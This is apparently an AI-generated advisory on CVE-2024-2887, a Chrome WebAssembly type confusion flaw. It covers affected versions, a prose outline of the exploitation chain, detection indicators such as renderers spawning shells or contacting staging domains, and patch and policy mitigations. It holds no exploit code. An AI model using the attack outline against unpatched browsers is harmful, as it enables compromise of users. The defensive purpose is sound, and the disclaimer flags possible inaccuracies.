CVE-2024-2887 Overview
CVE-2024-2887 is a type confusion vulnerability in the WebAssembly (Wasm) engine of Google Chrome versions prior to 123.0.6312.86. A remote attacker can execute arbitrary code by serving a crafted HTML page that loads malicious WebAssembly. The flaw was demonstrated as a Pwn2Own winning entry, as documented by the Zero Day Initiative. The bug is categorized as [CWE-843] Access of Resource Using Incompatible Type. Chromium-derived browsers and Fedora distributions shipping affected Chrome packages are also impacted.
Critical Impact
Successful exploitation enables arbitrary code execution in the renderer process from a single visit to an attacker-controlled web page.
Affected Products
- Google Chrome prior to 123.0.6312.86
- Fedora 38, 39, and 40 distributions packaging vulnerable Chromium builds
- Chromium-based browsers embedding the affected V8/WebAssembly engine
Discovery Timeline
- 2024-03-26 - Google releases Chrome 123.0.6312.86 containing the security fix
- 2024-03-26 - CVE-2024-2887 published to the National Vulnerability Database (NVD)
- 2024-05-02 - Zero Day Initiative publishes technical analysis identifying this as a Pwn2Own winning bug
- 2025-03-28 - Last updated in NVD database
Technical Details for CVE-2024-2887
Vulnerability Analysis
The vulnerability resides in Chrome's WebAssembly implementation within the V8 JavaScript engine. WebAssembly is a low-level binary instruction format that executes inside the browser sandbox at near-native speed. A type confusion condition arises when the engine treats an object of one type as an incompatible type during Wasm module compilation or execution. This mismatch corrupts internal type assumptions and produces memory-unsafe behavior. An attacker leverages the confusion to read or write outside the bounds of the originally typed object, ultimately corrupting V8 heap metadata. The renderer process is then steered toward attacker-controlled execution. Because WebAssembly is reachable from any web origin, no authentication or special privileges are required.
Root Cause
The root cause is improper type validation in the WebAssembly pipeline, classified as [CWE-843]. The engine fails to enforce consistent type identity between a producer and consumer of an object reference. This allows a crafted Wasm module to confuse type metadata used during JIT compilation or runtime dispatch, yielding an exploitable primitive.
Attack Vector
Exploitation requires the victim to load a crafted HTML page that instantiates a malicious WebAssembly module. The page triggers the type confusion in the renderer process, producing arbitrary read/write that can be chained into shellcode execution. Combined with a sandbox escape, the bug enables full remote code execution on the host, which is the chain demonstrated at Pwn2Own.
// No verified proof-of-concept code is publicly available.
// See https://issues.chromium.org/issues/330588502 for vendor tracking.
// Refer to the Zero Day Initiative analysis for exploitation context.
Detection Methods for CVE-2024-2887
Indicators of Compromise
- Chrome renderer process crashes referencing v8::internal::wasm frames or unexpected SIGSEGV events in crash dumps.
- Outbound connections from Chrome renderer or child processes to previously unseen domains immediately after loading a page hosting WebAssembly.
- Browser instances spawning unexpected child processes such as cmd.exe, powershell.exe, or shell interpreters on macOS and Linux.
- Endpoints running Chrome builds older than 123.0.6312.86 reported by software inventory tools.
Detection Strategies
- Inventory installed Chrome and Chromium-based browser versions across endpoints and flag any build below 123.0.6312.86.
- Inspect HTML and JavaScript fetched from untrusted origins for inline or remotely loaded .wasm payloads, especially those served alongside heap-grooming JavaScript.
- Correlate browser process crashes with subsequent process creation events to surface post-exploitation activity.
- Apply web proxy logging to capture Content-Type: application/wasm responses from low-reputation domains.
Monitoring Recommendations
- Forward Chrome crash telemetry and EDR process-tree data into a centralized analytics platform for correlation.
- Alert on child processes spawned by chrome.exe, chrome, or renderer helper processes that fall outside expected baselines.
- Track DNS and HTTP egress from browsers to newly registered domains, which are common staging hosts for browser exploits.
- Maintain alerting on patch compliance gaps for browsers across all managed operating systems, including Fedora hosts.
How to Mitigate CVE-2024-2887
Immediate Actions Required
- Update Google Chrome to version 123.0.6312.86 or later on Windows, macOS, and Linux endpoints.
- Apply Fedora package updates referenced in the Fedora package announcements for Fedora 38, 39, and 40.
- Restart all browser instances after patching to ensure the vulnerable renderer is replaced.
- Update Chromium-based browsers such as Edge, Brave, Opera, and Vivaldi to versions rebased on Chromium 123 or later.
Patch Information
Google addressed the issue in the Stable channel update announced in the Chrome Releases blog on March 26, 2024. Tracking details are available in the Chromium issue tracker. Fedora maintainers shipped corresponding package updates for supported releases.
Workarounds
- Disable WebAssembly through enterprise policy where supported, for example by setting the DefaultJavaScriptJitSetting to block JIT and using site-list controls to restrict Wasm execution on untrusted sites.
- Enforce Chrome Site Isolation and the strictest renderer sandbox settings via group policy on managed fleets.
- Route browsing traffic through a secure web gateway that strips or inspects application/wasm responses from uncategorized domains.
- Restrict execution of untrusted browser extensions and limit user navigation to vetted domains until patching is verified.
# Verify the installed Chrome version on Linux
google-chrome --version
# Update Chrome on Fedora
sudo dnf upgrade --refresh google-chrome-stable
# Enterprise policy snippet to disable JavaScript JIT (and Wasm JIT) on untrusted sites
# /etc/opt/chrome/policies/managed/disable_jit.json
{
"DefaultJavaScriptJitSetting": 2,
"JavaScriptJitBlockedForSites": ["*"]
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
